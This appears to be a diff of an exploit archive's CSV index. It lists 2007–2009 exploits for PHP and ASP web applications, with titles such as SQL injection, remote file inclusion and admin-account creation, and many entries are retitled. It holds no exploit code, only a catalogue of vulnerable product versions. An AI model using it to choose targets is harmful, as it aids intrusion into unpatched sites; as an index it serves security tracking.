4459,platforms/php/webapps/4459.txt,"ActiveKB KnowledgeBase 2.x - 'catId' Parameter SQL Injection",2007-09-26,Luna-Tic/XTErner,php,webapps,0
4461,platforms/php/webapps/4461.txt,"lustig.cms Beta 2.5 - (forum.php view) Remote File Inclusion",2007-09-27,GoLd_M,php,webapps,0
4462,platforms/php/webapps/4462.txt,"Chupix CMS 0.2.3 - (repertoire) Remote File Inclusion",2007-09-27,0in,php,webapps,0
4463,platforms/php/webapps/4463.txt,"Integramod Nederland 1.4.2 - Remote File Inclusion",2007-09-27,"Mehmet Ince",php,webapps,0
4464,platforms/php/webapps/4464.txt,"PhFiTo 1.3.0 - (SRC_PATH) Remote File Inclusion",2007-09-28,w0cker,php,webapps,0
4465,platforms/php/webapps/4465.txt,"public media manager 1.3 - Remote File Inclusion",2007-09-28,0in,php,webapps,0
4466,platforms/php/webapps/4466.php,"Zomplog 3.8.1 - upload_files.php Arbitrary File Upload",2007-09-28,InATeam,php,webapps,0
4466,platforms/php/webapps/4466.php,"Zomplog 3.8.1 - Arbitrary File Upload",2007-09-28,InATeam,php,webapps,0
4467,platforms/php/webapps/4467.pl,"MD-Pro 1.0.76 - SQL Injection",2007-09-29,undefined1_,php,webapps,0
4469,platforms/php/webapps/4469.txt,"Mambo Component Mambads 1.5 - SQL Injection",2007-09-29,Sniper456,php,webapps,0
4470,platforms/php/webapps/4470.txt,"mxBB Module mx_glance 2.3.3 - Remote File Inclusion",2007-09-29,bd0rk,php,webapps,0
@ -18117,7 +18120,7 @@ id,file,description,date,author,platform,type,port
4807,platforms/php/webapps/4807.php,"jPORTAL 2.3.1 & UserPatch - 'forum.php' Remote Code Execution",2007-12-29,irk4z,php,webapps,0
4808,platforms/php/webapps/4808.txt,"Mihalism Multi Forum Host 3.0.x - Remote File Inclusion",2007-12-29,GoLd_M,php,webapps,0
4809,platforms/php/webapps/4809.txt,"CCMS 3.1 Demo - SQL Injection",2007-12-29,Pr0metheuS,php,webapps,0
4810,platforms/php/webapps/4810.txt,"CMS Made Simple 1.2.2 - (TinyMCE module) SQL Injection",2007-12-30,EgiX,php,webapps,0
4810,platforms/php/webapps/4810.txt,"CMS Made Simple 1.2.2 Module TinyMCE - SQL Injection",2007-12-30,EgiX,php,webapps,0
4811,platforms/php/webapps/4811.txt,"kontakt formular 1.4 - Remote File Inclusion",2007-12-30,bd0rk,php,webapps,0
4812,platforms/php/webapps/4812.txt,"Mihalism Multi Host 2.0.7 - 'download.php' Remote File Disclosure",2007-12-30,GoLd_M,php,webapps,0
4813,platforms/php/webapps/4813.txt,"XCMS 1.83 - Remote Command Execution",2007-12-30,x0kster,php,webapps,0
@ -18697,81 +18700,81 @@ id,file,description,date,author,platform,type,port
5595,platforms/php/webapps/5595.txt,"ClanLite 2.x - SQL Injection / Cross-Site Scripting",2008-05-12,ZoRLu,php,webapps,0
5596,platforms/php/webapps/5596.txt,"BigACE 2.4 - Multiple Remote File Inclusion",2008-05-12,BiNgZa,php,webapps,0
5597,platforms/php/webapps/5597.pl,"Battle.net Clan Script 1.5.x - SQL Injection",2008-05-12,Stack,php,webapps,0
5598,platforms/php/webapps/5598.txt,"Mega File Hosting Script 1.2 - (fid) SQL Injection",2008-05-12,TurkishWarriorr,php,webapps,0
5598,platforms/php/webapps/5598.txt,"Mega File Hosting Script 1.2 - 'fid' Parameter SQL Injection",2008-05-12,TurkishWarriorr,php,webapps,0
5599,platforms/php/webapps/5599.txt,"PHP Classifieds Script 05122008 - SQL Injection",2008-05-12,InjEctOr5,php,webapps,0
5600,platforms/php/webapps/5600.php,"CMS Made Simple 1.2.4 - (FileManager module) Arbitrary File Upload",2008-05-12,EgiX,php,webapps,0
5600,platforms/php/webapps/5600.php,"CMS Made Simple 1.2.4 Module FileManager - Arbitrary File Upload",2008-05-12,EgiX,php,webapps,0
5601,platforms/php/webapps/5601.pl,"Advanced Image Hosting (AIH) 2.1 - SQL Injection",2008-05-12,Stack,php,webapps,0
5602,platforms/php/webapps/5602.txt,"AJ HYIP ACME - 'topic_detail.php id' SQL Injection",2008-05-12,InjEctOr5,php,webapps,0
5603,platforms/php/webapps/5603.txt,"EQDKP 1.3.2f - (user_id) Authentication Bypass (PoC)",2008-05-13,vortfu,php,webapps,0
5604,platforms/php/webapps/5604.txt,"e107 Plugin BLOG Engine 2.2 - (rid) Blind SQL Injection",2008-05-13,Saime,php,webapps,0
5602,platforms/php/webapps/5602.txt,"AJ HYIP ACME - 'topic_detail.php' SQL Injection",2008-05-12,InjEctOr5,php,webapps,0
5603,platforms/php/webapps/5603.txt,"EQdkp 1.3.2f - 'user_id' Authentication Bypass (PoC)",2008-05-13,vortfu,php,webapps,0
5604,platforms/php/webapps/5604.txt,"e107 Plugin BLOG Engine 2.2 - 'rid' Parameter Blind SQL Injection",2008-05-13,Saime,php,webapps,0
5605,platforms/php/webapps/5605.txt,"e-107 Plugin ZoGo-Shop 1.16 Beta 13 - SQL Injection",2008-05-13,Cr@zy_King,php,webapps,0
5606,platforms/php/webapps/5606.txt,"Web Group Communication Center (WGCC) 1.0.3 - SQL Injection",2008-05-13,myvx,php,webapps,0
5607,platforms/php/webapps/5607.txt,"CaLogic Calendars 1.2.2 - (langsel) SQL Injection",2008-05-13,His0k4,php,webapps,0
5607,platforms/php/webapps/5607.txt,"CaLogic Calendars 1.2.2 - 'langsel' Parameter SQL Injection",2008-05-13,His0k4,php,webapps,0
5608,platforms/asp/webapps/5608.txt,"Meto Forum 1.1 - Multiple SQL Injections",2008-05-13,U238,asp,webapps,0
5609,platforms/php/webapps/5609.txt,"EMO Realty Manager - 'news.php ida' SQL Injection",2008-05-13,HaCkeR_EgY,php,webapps,0
5610,platforms/php/webapps/5610.txt,"The Real Estate Script - 'dpage.php docID' SQL Injection",2008-05-13,HaCkeR_EgY,php,webapps,0
5611,platforms/php/webapps/5611.txt,"Linkspile - 'link.php cat_id' SQL Injection",2008-05-13,HaCkeR_EgY,php,webapps,0
5613,platforms/php/webapps/5613.txt,"Freelance Auction Script 1.0 - (browseproject.php) SQL Injection",2008-05-14,t0pP8uZz,php,webapps,0
5609,platforms/php/webapps/5609.txt,"EMO Realty Manager - 'ida' Parameter SQL Injection",2008-05-13,HaCkeR_EgY,php,webapps,0
5610,platforms/php/webapps/5610.txt,"The Real Estate Script - 'docID' Parameter SQL Injection",2008-05-13,HaCkeR_EgY,php,webapps,0
5611,platforms/php/webapps/5611.txt,"Linkspile - 'cat_id' Parameter SQL Injection",2008-05-13,HaCkeR_EgY,php,webapps,0
5613,platforms/php/webapps/5613.txt,"Freelance Auction Script 1.0 - 'browseproject.php' SQL Injection",2008-05-14,t0pP8uZz,php,webapps,0
5614,platforms/php/webapps/5614.txt,"Feedback and Rating Script 1.0 - 'detail.php' SQL Injection",2008-05-14,t0pP8uZz,php,webapps,0
5615,platforms/php/webapps/5615.txt,"AS-GasTracker 1.0.0 - Insecure Cookie Handling",2008-05-14,t0pP8uZz,php,webapps,0
5616,platforms/php/webapps/5616.txt,"ActiveKB 1.5 - Insecure Cookie Handling/Arbitrary Admin Access",2008-05-14,t0pP8uZz,php,webapps,0
5617,platforms/php/webapps/5617.txt,"Internet PhotoShow (Special Edition) - Insecure Cookie Handling",2008-05-14,t0pP8uZz,php,webapps,0
5618,platforms/php/webapps/5618.txt,"Lanius CMS 1.2.16 - 'FCKeditor' Arbitrary File Upload",2008-05-14,EgiX,php,webapps,0
5620,platforms/php/webapps/5620.txt,"rgboard 3.0.12 - (Remote File Inclusioni / Cross-Site Scripting) Multiple Vulnerabilities",2008-05-14,e.wiZz!,php,webapps,0
5621,platforms/php/webapps/5621.txt,"Kostenloses Linkmanagementscript - (page_to_include) Remote File Inclusion",2008-05-14,HaCkeR_EgY,php,webapps,0
5620,platforms/php/webapps/5620.txt,"rgboard 3.0.12 - Remote File Inclusioni / Cross-Site Scripting",2008-05-14,e.wiZz!,php,webapps,0
5621,platforms/php/webapps/5621.txt,"Kostenloses Linkmanagementscript - Remote File Inclusion",2008-05-14,HaCkeR_EgY,php,webapps,0
5623,platforms/php/webapps/5623.txt,"Kostenloses Linkmanagementscript - SQL Injection",2008-05-15,"Virangar Security",php,webapps,0
5624,platforms/php/webapps/5624.txt,"newsmanager 2.0 - (Remote File Inclusion / File Disclosure / SQL Injection / pb) Multiple Vulnerabilities",2008-05-15,GoLd_M,php,webapps,0
5626,platforms/php/webapps/5626.txt,"68 Classifieds 4.0 - (category.php cat) SQL Injection",2008-05-15,HaCkeR_EgY,php,webapps,0
5624,platforms/php/webapps/5624.txt,"newsmanager 2.0 - Remote File Inclusion / File Disclosure / SQL Injection",2008-05-15,GoLd_M,php,webapps,0
5626,platforms/php/webapps/5626.txt,"68 Classifieds 4.0 - 'category.php' SQL Injection",2008-05-15,HaCkeR_EgY,php,webapps,0
5627,platforms/php/webapps/5627.pl,"Pet Grooming Management System 2.0 - Arbitrary Add Admin",2008-05-15,t0pP8uZz,php,webapps,0
5628,platforms/php/webapps/5628.txt,"RantX 1.0 - Insecure Admin Authentication",2008-05-15,t0pP8uZz,php,webapps,0
5629,platforms/php/webapps/5629.txt,"Web Slider 0.6 - Insecure Cookie/Authentication Handling",2008-05-15,t0pP8uZz,php,webapps,0
5630,platforms/php/webapps/5630.txt,"Multi-Page Comment System 1.1.0 - Insecure Cookie Handling",2008-05-15,t0pP8uZz,php,webapps,0
5631,platforms/php/webapps/5631.txt,"IMGallery 2.5 - Multiple SQL Injections",2008-05-15,cOndemned,php,webapps,0
5633,platforms/asp/webapps/5633.pl,"StanWeb.CMS - (default.asp id) SQL Injection",2008-05-16,JosS,asp,webapps,0
5633,platforms/asp/webapps/5633.pl,"StanWeb.CMS - SQL Injection",2008-05-16,JosS,asp,webapps,0
5634,platforms/php/webapps/5634.htm,"Zomplog 3.8.2 - 'newuser.php' Arbitrary Add Admin",2008-05-16,ArxWolf,php,webapps,0
5635,platforms/php/webapps/5635.pl,"Archangel Weblog 0.90.02 - (post_id) SQL Injection",2008-05-16,Stack,php,webapps,0
5635,platforms/php/webapps/5635.pl,"Archangel Weblog 0.90.02 - 'post_id' Parameter SQL Injection",2008-05-16,Stack,php,webapps,0
5636,platforms/php/webapps/5636.txt,"Zomplog 3.8.2 - 'force_download.php' File Disclosure",2008-05-16,Stack,php,webapps,0
5637,platforms/php/webapps/5637.txt,"WR-Meeting 1.0 - (msnum) Local File Disclosure",2008-05-17,Cr@zy_King,php,webapps,0
5637,platforms/php/webapps/5637.txt,"WR-Meeting 1.0 - 'msnum' Parameter Local File Disclosure",2008-05-17,Cr@zy_King,php,webapps,0
5638,platforms/php/webapps/5638.txt,"How2ASP.net WebBoard 4.1 - SQL Injection",2008-05-17,"CWH Underground",php,webapps,0
5639,platforms/php/webapps/5639.pl,"FicHive 1.0 - (category) Blind SQL Injection",2008-05-17,His0k4,php,webapps,0
5640,platforms/php/webapps/5640.py,"Smeego 1.0 - (Cookie lang) Local File Inclusion",2008-05-17,0in,php,webapps,0
5639,platforms/php/webapps/5639.pl,"FicHive 1.0 - 'category' Parameter Blind SQL Injection",2008-05-17,His0k4,php,webapps,0
5640,platforms/php/webapps/5640.py,"Smeego 1.0 - 'Cookie lang' Local File Inclusion",2008-05-17,0in,php,webapps,0
5641,platforms/php/webapps/5641.txt,"CMS WebManager-Pro - Multiple SQL Injections",2008-05-18,dun,php,webapps,0
5642,platforms/php/webapps/5642.txt,"TAGWORX.CMS - Multiple SQL Injections",2008-05-18,dun,php,webapps,0
5642,platforms/php/webapps/5642.txt,"TAGWORX.CMS 3.00.02 - Multiple SQL Injections",2008-05-18,dun,php,webapps,0
5643,platforms/php/webapps/5643.txt,"Ajax Framework - 'lang' Local File Inclusion",2008-05-18,dun,php,webapps,0
5644,platforms/php/webapps/5644.txt,"lulieblog 1.2 - Multiple Vulnerabilities",2008-05-18,Cod3rZ,php,webapps,0
5645,platforms/php/webapps/5645.txt,"AlkalinePHP 0.77.35 - (adduser.php) Arbitrary Add Admin",2008-05-18,t0pP8uZz,php,webapps,0
5646,platforms/php/webapps/5646.txt,"easycms 0.4.2 - Multiple Vulnerabilities",2008-05-18,t0pP8uZz,php,webapps,0
5644,platforms/php/webapps/5644.txt,"Lulieblog 1.2 - Multiple Vulnerabilities",2008-05-18,Cod3rZ,php,webapps,0
5645,platforms/php/webapps/5645.txt,"AlkalinePHP 0.77.35 - 'adduser.php' Arbitrary Add Admin",2008-05-18,t0pP8uZz,php,webapps,0
5646,platforms/php/webapps/5646.txt,"Easycms 0.4.2 - Multiple Vulnerabilities",2008-05-18,t0pP8uZz,php,webapps,0
5647,platforms/php/webapps/5647.txt,"GNU/Gallery 1.1.1.0 - 'admin.php' Local File Inclusion",2008-05-18,t0pP8uZz,php,webapps,0
5648,platforms/php/webapps/5648.pl,"MeltingIce File System 1.0 - Arbitrary Add User Exploit",2008-05-18,t0pP8uZz,php,webapps,0
5649,platforms/php/webapps/5649.pl,"PHP-AGTC Membership System 1.1a - Arbitrary Add Admin",2008-05-18,t0pP8uZz,php,webapps,0
5650,platforms/php/webapps/5650.pl,"MyPicGallery 1.0 - Arbitrary Add Admin",2008-05-18,t0pP8uZz,php,webapps,0
5651,platforms/php/webapps/5651.txt,"microssys CMS 1.5 - Remote File Inclusion",2008-05-19,Raz0r,php,webapps,0
5652,platforms/php/webapps/5652.pl,"AlkalinePHP 0.80.00 Beta - (thread.php id) SQL Injection",2008-05-19,Stack,php,webapps,0
5652,platforms/php/webapps/5652.pl,"AlkalinePHP 0.80.00 Beta - 'thread.php' SQL Injection",2008-05-19,Stack,php,webapps,0
5653,platforms/php/webapps/5653.php,"MercuryBoard 1.1.5 - 'login.php' Blind SQL Injection",2008-05-19,EgiX,php,webapps,0
5654,platforms/php/webapps/5654.txt,"EntertainmentScript - 'play.php id' SQL Injection",2008-05-19,Mr.SQL,php,webapps,0
5654,platforms/php/webapps/5654.txt,"EntertainmentScript 1.4.0 - 'play.php' SQL Injection",2008-05-19,Mr.SQL,php,webapps,0
5655,platforms/php/webapps/5655.pl,"EntertainmentScript 1.4.0 - 'page.php' Local File Inclusion",2008-05-20,Stack,php,webapps,0
5656,platforms/php/webapps/5656.txt,"ecms 0.4.2 - (SQL Injection / Security Bypass) Multiple Vulnerabilities",2008-05-20,"Virangar Security",php,webapps,0
5657,platforms/php/webapps/5657.txt,"Mantis Bug Tracker 1.1.1 - (Code Execution / Cross-Site Scripting / Cross-Site Request Forgery) Multiple Vulnerabilities",2008-05-20,USH,php,webapps,0
5658,platforms/php/webapps/5658.txt,"ComicShout 2.5 - (index.php comic_id) SQL Injection",2008-05-20,Niiub,php,webapps,0
5656,platforms/php/webapps/5656.txt,"eCMS 0.4.2 - SQL Injection / Security Bypass",2008-05-20,"Virangar Security",php,webapps,0
5657,platforms/php/webapps/5657.txt,"Mantis Bug Tracker 1.1.1 - Code Execution / Cross-Site Scripting / Cross-Site Request Forgery",2008-05-20,USH,php,webapps,0
5658,platforms/php/webapps/5658.txt,"ComicShout 2.5 - 'comic_id' Parameter SQL Injection",2008-05-20,Niiub,php,webapps,0
5659,platforms/php/webapps/5659.txt,"MX-System 2.7.3 - 'index.php' SQL Injection",2008-05-20,cOndemned,php,webapps,0
5660,platforms/php/webapps/5660.txt,"PHP Jokesite 2.0 - 'cat_id' SQL Injection",2008-05-20,InjEctOr5,php,webapps,0
5661,platforms/php/webapps/5661.txt,"Netious CMS 0.4 - (index.php pageid) SQL Injection",2008-05-21,InjEctOr5,php,webapps,0
5660,platforms/php/webapps/5660.txt,"PHP Jokesite 2.0 - 'cat_id' Parameter SQL Injection",2008-05-20,InjEctOr5,php,webapps,0
5661,platforms/php/webapps/5661.txt,"Netious CMS 0.4 - 'pageid' Parameter SQL Injection",2008-05-21,InjEctOr5,php,webapps,0
5662,platforms/cgi/webapps/5662.txt,"Alcatel OmniPCX Office 210/061.1 - Remote Command Execution",2008-05-21,DSecRG,cgi,webapps,0
5663,platforms/php/webapps/5663.txt,"6rbScript - 'news.php newsid' SQL Injection",2008-05-21,"Hussin X",php,webapps,0
5664,platforms/php/webapps/5664.txt,"webl?sninger 4 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2008-05-21,Mr.SQL,php,webapps,0
5663,platforms/php/webapps/5663.txt,"6rbScript - 'news.php' SQL Injection",2008-05-21,"Hussin X",php,webapps,0
5664,platforms/php/webapps/5664.txt,"Weblosninger 4 - Cross-Site Scripting / SQL Injection",2008-05-21,Mr.SQL,php,webapps,0
5665,platforms/php/webapps/5665.txt,"Netbutikker 4 - SQL Injection",2008-05-21,Mr.SQL,php,webapps,0
5666,platforms/php/webapps/5666.txt,"e107 Plugin BLOG Engine 2.2 - 'uid' Blind SQL Injection",2008-05-22,"Virangar Security",php,webapps,0
5668,platforms/php/webapps/5668.txt,"Quate CMS 0.3.4 - (Remote File Inclusion / Local File Inclusion / Cross-Site Scripting / dt) Multiple Vulnerabilities",2008-05-23,DSecRG,php,webapps,0
5666,platforms/php/webapps/5666.txt,"e107 Plugin BLOG Engine 2.2 - 'uid' Parameter Blind SQL Injection",2008-05-22,"Virangar Security",php,webapps,0
5668,platforms/php/webapps/5668.txt,"Quate CMS 0.3.4 - Multiple Vulnerabilities",2008-05-23,DSecRG,php,webapps,0
5669,platforms/php/webapps/5669.txt,"OneCMS 2.5 - 'install_mod.php' Local File Inclusion",2008-05-23,DSecRG,php,webapps,0
5670,platforms/php/webapps/5670.txt,"RoomPHPlanning 1.5 - (idresa) SQL Injection",2008-05-24,His0k4,php,webapps,0
5671,platforms/php/webapps/5671.txt,"PHPRaider 1.0.7 - (PHPbb3.functions.php) Remote File Inclusion",2008-05-24,Kacak,php,webapps,0
5670,platforms/php/webapps/5670.txt,"RoomPHPlanning 1.5 - 'idresa' Parameter SQL Injection",2008-05-24,His0k4,php,webapps,0
5671,platforms/php/webapps/5671.txt,"PHPRaider 1.0.7 - 'PHPbb3.functions.php' Remote File Inclusion",2008-05-24,Kacak,php,webapps,0
5672,platforms/php/webapps/5672.txt,"plusphp url shortening software 1.6 - Remote File Inclusion",2008-05-25,DR.TOXIC,php,webapps,0
5673,platforms/php/webapps/5673.txt,"Xomol CMS 1.2 - Login Bypass / Local File Inclusion",2008-05-25,DNX,php,webapps,0
5674,platforms/php/webapps/5674.txt,"RoomPHPlanning 1.5 - Arbitrary Add Admin",2008-05-26,Stack,php,webapps,0
5675,platforms/php/webapps/5675.txt,"RoomPHPlanning 1.5 - Multiple SQL Injections",2008-05-26,"Virangar Security",php,webapps,0
5676,platforms/php/webapps/5676.txt,"CMS MAXSITE 1.10 - (category) SQL Injection",2008-05-26,Tesz,php,webapps,0
5676,platforms/php/webapps/5676.txt,"CMS MAXSITE 1.10 - 'category' Parameter SQL Injection",2008-05-26,Tesz,php,webapps,0
5677,platforms/php/webapps/5677.txt,"RevokeBB 1.0 RC11 - 'Search' SQL Injection",2008-05-27,The:Paradox,php,webapps,0
5678,platforms/php/webapps/5678.txt,"CKGold Shopping Cart 2.5 - (category_id) SQL Injection",2008-05-27,Cr@zy_King,php,webapps,0
5678,platforms/php/webapps/5678.txt,"CKGold Shopping Cart 2.5 - 'category_id' Parameter SQL Injection",2008-05-27,Cr@zy_King,php,webapps,0
5680,platforms/php/webapps/5680.txt,"OtomiGen.x 2.2 - 'lang' Local File Inclusion",2008-05-27,Saime,php,webapps,0
5683,platforms/php/webapps/5683.txt,"PHPhotoalbum 0.5 - Multiple SQL Injections",2008-05-28,cOndemned,php,webapps,0
5684,platforms/php/webapps/5684.txt,"Joomla! Component Artist (idgalery) - SQL Injection",2008-05-28,Cr@zy_King,php,webapps,0
@ -18797,7 +18800,7 @@ id,file,description,date,author,platform,type,port
5708,platforms/php/webapps/5708.txt,"Joomla! Component prayercenter 1.4.9 - 'id' SQL Injection",2008-05-31,His0k4,php,webapps,0
5710,platforms/php/webapps/5710.pl,"Joomla! Component com_biblestudy 1.5.0 - 'id' SQL Injection",2008-05-31,Stack,php,webapps,0
5711,platforms/php/webapps/5711.txt,"Social Site Generator 2.0 - Multiple Remote File Disclosure Vulnerabilities",2008-06-01,Stack,php,webapps,0
5713,platforms/php/webapps/5713.txt,"ComicShout 2.8 - (news.php news_id) SQL Injection",2008-06-01,JosS,php,webapps,0
5713,platforms/php/webapps/5713.txt,"ComicShout 2.8 - 'news_id' Parameter SQL Injection",2008-06-01,JosS,php,webapps,0
5714,platforms/php/webapps/5714.pl,"Joomla! Component com_mycontent 1.1.13 - Blind SQL Injection",2008-06-01,His0k4,php,webapps,0
5715,platforms/php/webapps/5715.txt,"DesktopOnNet 3 Beta - Multiple Remote File Inclusion",2008-06-01,MK,php,webapps,0
5716,platforms/php/webapps/5716.txt,"mebiblio 0.4.7 - (SQL Injection / Arbitrary File Upload / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-01,"CWH Underground",php,webapps,0
@ -18949,7 +18952,7 @@ id,file,description,date,author,platform,type,port
5887,platforms/php/webapps/5887.pl,"LE.CMS 1.4 - Arbitrary File Upload",2008-06-21,t0pP8uZz,php,webapps,0
5888,platforms/php/webapps/5888.txt,"CCLeague Pro 1.2 - Insecure Cookie Authentication",2008-06-21,t0pP8uZz,php,webapps,0
5889,platforms/php/webapps/5889.txt,"OFFL 0.2.6 - (teams.php fflteam) SQL Injection",2008-06-21,t0pP8uZz,php,webapps,0
5890,platforms/php/webapps/5890.txt,"AJ HYIP ACME - 'news.php id' SQL Injection",2008-06-21,"Hussin X",php,webapps,0
5890,platforms/php/webapps/5890.txt,"AJ HYIP ACME - 'news.php' SQL Injection",2008-06-21,"Hussin X",php,webapps,0
5892,platforms/php/webapps/5892.txt,"phpAuction 3.2.1 - (item.php id) SQL Injection",2008-06-21,"Hussin X",php,webapps,0
5893,platforms/php/webapps/5893.txt,"Joomla! Component EXP Shop - 'catid' SQL Injection",2008-06-22,His0k4,php,webapps,0
5894,platforms/asp/webapps/5894.txt,"DUdForum 3.0 - (forum.asp iFor) SQL Injection",2008-06-22,Bl@ckbe@rD,asp,webapps,0
@ -19211,7 +19214,7 @@ id,file,description,date,author,platform,type,port
6208,platforms/php/webapps/6208.txt,"Multiple Wsn Products - (Local File Inclusion) Code Execution",2008-08-06,otmorozok428,php,webapps,0
6209,platforms/php/webapps/6209.rb,"LoveCMS 1.6.2 Final - Remote Code Execution",2008-08-06,PoMdaPiMp,php,webapps,0
6210,platforms/php/webapps/6210.rb,"LoveCMS 1.6.2 Final - Update Settings Remote Exploit",2008-08-06,PoMdaPiMp,php,webapps,0
6211,platforms/php/webapps/6211.txt,"Quate CMS 0.3.4 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2008-08-06,CraCkEr,php,webapps,0
6211,platforms/php/webapps/6211.txt,"Quate CMS 0.3.4 - Local File Inclusion / Cross-Site Scripting",2008-08-06,CraCkEr,php,webapps,0
6213,platforms/php/webapps/6213.txt,"Free Hosting Manager 1.2/2.0 - Insecure Cookie Handling",2008-08-06,Scary-Boys,php,webapps,0
6214,platforms/php/webapps/6214.php,"Discuz! 6.0.1 - (searchid) SQL Injection",2008-08-06,james,php,webapps,0
6215,platforms/php/webapps/6215.txt,"pPIM 1.0 - (Arbitrary File Delete / Cross-Site Scripting) Multiple Vulnerabilities",2008-08-10,BeyazKurt,php,webapps,0
@ -19283,12 +19286,12 @@ id,file,description,date,author,platform,type,port
6342,platforms/php/webapps/6342.txt,"EasyClassifields 3.0 - (go) SQL Injection",2008-09-01,e.wiZz!,php,webapps,0
6343,platforms/php/webapps/6343.txt,"CMSbright - (id_rub_page) SQL Injection",2008-09-01,"BorN To K!LL",php,webapps,0
6344,platforms/php/webapps/6344.php,"WeBid 0.5.4 - 'FCKeditor' Arbitrary File Upload",2008-09-01,Stack,php,webapps,0
6346,platforms/php/webapps/6346.pl,"e107 Plugin BLOG Engine 2.2 - 'uid' SQL Injection",2008-09-01,"Virangar Security",php,webapps,0
6346,platforms/php/webapps/6346.pl,"e107 Plugin BLOG Engine 2.2 - 'uid' Parameter SQL Injection",2008-09-01,"Virangar Security",php,webapps,0
6347,platforms/php/webapps/6347.txt,"myPHPNuke < 1.8.8_8rc2 - (artid) SQL Injection",2008-09-02,MustLive,php,webapps,0
6348,platforms/php/webapps/6348.txt,"Coupon Script 4.0 - 'id' SQL Injection",2008-09-02,"Hussin X",php,webapps,0
6349,platforms/php/webapps/6349.txt,"Reciprocal Links Manager 1.1 - (site) SQL Injection",2008-09-02,"Hussin X",php,webapps,0
6350,platforms/php/webapps/6350.txt,"AJ HYIP ACME - 'comment.php artid' SQL Injection",2008-09-02,"security fears team",php,webapps,0
6351,platforms/php/webapps/6351.txt,"AJ HYIP ACME - 'readarticle.php artid' SQL Injection",2008-09-02,InjEctOr5,php,webapps,0
6350,platforms/php/webapps/6350.txt,"AJ HYIP ACME - 'comment.php' SQL Injection",2008-09-02,"security fears team",php,webapps,0
6351,platforms/php/webapps/6351.txt,"AJ HYIP ACME - 'readarticle.php' SQL Injection",2008-09-02,InjEctOr5,php,webapps,0
6352,platforms/php/webapps/6352.txt,"CS-Cart 1.3.5 - (Authentication Bypass) SQL Injection",2008-09-02,"GulfTech Security",php,webapps,0
6354,platforms/php/webapps/6354.txt,"Spice Classifieds - (cat_path) SQL Injection",2008-09-03,InjEctOr5,php,webapps,0
6356,platforms/php/webapps/6356.php,"Moodle 1.8.4 - Remote Code Execution",2008-09-03,zurlich.lpt,php,webapps,0
@ -19405,7 +19408,7 @@ id,file,description,date,author,platform,type,port
6508,platforms/php/webapps/6508.txt,"Basic PHP Events Lister 1.0 - SQL Injection",2008-09-21,0x90,php,webapps,0
6509,platforms/cgi/webapps/6509.txt,"TWiki 4.2.2 - 'action' Remote Code Execution",2008-09-21,webDEViL,cgi,webapps,0
6510,platforms/php/webapps/6510.txt,"PHPKB 1.5 Professional - Multiple SQL Injections",2008-09-21,d3v1l,php,webapps,0
6511,platforms/php/webapps/6511.txt,"6rbScript 3.3 - 'singerid' SQL Injection",2008-09-21,"Hussin X",php,webapps,0
6511,platforms/php/webapps/6511.txt,"6rbScript 3.3 - 'singerid' Parameter SQL Injection",2008-09-21,"Hussin X",php,webapps,0
6512,platforms/php/webapps/6512.txt,"Diesel Job Site - (job_id) Blind SQL Injection",2008-09-21,Stack,php,webapps,0
6513,platforms/php/webapps/6513.txt,"Rianxosencabos CMS 0.9 - Arbitrary Add Admin",2008-09-21,"CWH Underground",php,webapps,0
6514,platforms/php/webapps/6514.txt,"AvailScript Jobs Portal Script - Authenticated Arbitrary File Upload",2008-09-21,InjEctOr5,php,webapps,0
@ -19413,7 +19416,7 @@ id,file,description,date,author,platform,type,port
6517,platforms/php/webapps/6517.txt,"Netartmedia Jobs Portal 1.3 - Multiple SQL Injections",2008-09-21,Encrypt3d.M!nd,php,webapps,0
6518,platforms/php/webapps/6518.txt,"Netartmedia Real Estate Portal 1.2 - SQL Injection",2008-09-21,Encrypt3d.M!nd,php,webapps,0
6519,platforms/php/webapps/6519.php,"PHP iCalendar 2.24 - (cookie_language) Local File Inclusion / Arbitrary File Upload",2008-09-21,EgiX,php,webapps,0
6520,platforms/php/webapps/6520.txt,"6rbScript 3.3 - (section.php name) Local File Inclusion",2008-09-21,Stack,php,webapps,0
6520,platforms/php/webapps/6520.txt,"6rbScript 3.3 - 'section.php' Local File Inclusion",2008-09-21,Stack,php,webapps,0
6521,platforms/php/webapps/6521.txt,"Rianxosencabos CMS 0.9 - Insecure Cookie Handling",2008-09-21,Stack,php,webapps,0
6522,platforms/php/webapps/6522.txt,"AvailScript Article Script - 'view.php v' SQL Injection",2008-09-21,"Hussin X",php,webapps,0
6523,platforms/php/webapps/6523.php,"WCMS 1.0b - Arbitrary Add Admin",2008-09-22,"CWH Underground",php,webapps,0
@ -20649,7 +20652,7 @@ id,file,description,date,author,platform,type,port
8195,platforms/php/webapps/8195.txt,"WeBid 0.7.3 RC9 - Multiple Remote File Inclusion",2009-03-10,K-159,php,webapps,0
8196,platforms/php/webapps/8196.txt,"WordPress MU < 2.7 - 'HOST' HTTP Header Cross-Site Scripting",2009-03-10,"Juan Galiana Lara",php,webapps,0
8197,platforms/php/webapps/8197.txt,"Joomla! Component Djice Shoutbox 1.0 - Permanent Cross-Site Scripting",2009-03-10,XaDoS,php,webapps,0
8198,platforms/php/webapps/8198.pl,"RoomPHPlanning 1.6 - (userform.php) Create Admin User Exploit",2009-03-10,"Jonathan Salwan",php,webapps,0
8198,platforms/php/webapps/8198.pl,"RoomPHPlanning 1.6 - 'userform.php' Create Admin User",2009-03-10,"Jonathan Salwan",php,webapps,0
8202,platforms/php/webapps/8202.htm,"Traidnt up 2.0 - 'cookie' Add Extension Bypass Exploit",2009-03-11,SP4rT,php,webapps,0
8204,platforms/php/webapps/8204.txt,"phpmysport 1.4 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2009-03-12,XaDoS,php,webapps,0
8207,platforms/php/webapps/8207.txt,"YAP 1.1.1 - 'index.php' Local File Inclusion",2009-03-13,Alkindiii,php,webapps,0
@ -20661,9 +20664,9 @@ id,file,description,date,author,platform,type,port
8226,platforms/php/webapps/8226.txt,"PHPRunner 4.2 - (SearchOption) Blind SQL Injection",2009-03-17,BugReport.IR,php,webapps,0
8228,platforms/php/webapps/8228.txt,"GDL 4.x - (node) SQL Injection",2009-03-17,g4t3w4y,php,webapps,0
8229,platforms/php/webapps/8229.txt,"WordPress Plugin fMoblog 2.1 - 'id' SQL Injection",2009-03-17,"strange kevin",php,webapps,0
8230,platforms/php/webapps/8230.txt,"Mega File Hosting Script 1.2 - (cross.php url) Remote File Inclusion",2009-03-17,Garry,php,webapps,0
